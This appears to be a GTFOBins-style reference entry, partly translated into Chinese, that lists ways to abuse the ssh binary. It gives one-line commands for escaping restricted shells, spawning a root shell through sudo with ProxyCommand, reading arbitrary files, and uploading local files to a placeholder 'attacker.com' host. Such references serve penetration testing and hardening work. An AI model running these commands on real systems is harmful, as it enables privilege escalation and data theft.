.. / ssh

shell

用来生成一个交互式的系统shell。

• Reconnecting may help bypassing restricted shells.

  ssh localhost $SHELL --noprofile --norc

  Spawn interactive shell through ProxyCommand option.

  ssh -o ProxyCommand=';sh 0<&2 1>&2' x

  Spawn interactive shell on client, requires a successful connection towards host.

  ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host

file-upload

上传文件到外部。

• Send local file to a SSH server.

  HOST=user@attacker.com
  RPATH=file_to_save
  LPATH=要发送的文件
  ssh $HOST "cat > $RPATH" < $LPATH
  

file-download

下载远程文件。

• Fetch a remote file from a SSH server.

  HOST=user@attacker.com
  RPATH=file_to_get
  LPATH=file_to_save
  ssh $HOST "cat $RPATH" > $LPATH
  

file-read

从文件中读取数据。

• The read file content is corrupted by error prints.

  LFILE=要读取的文件路径
  ssh -F $LFILE localhost
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• Spawn interactive root shell through ProxyCommand option.

  sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x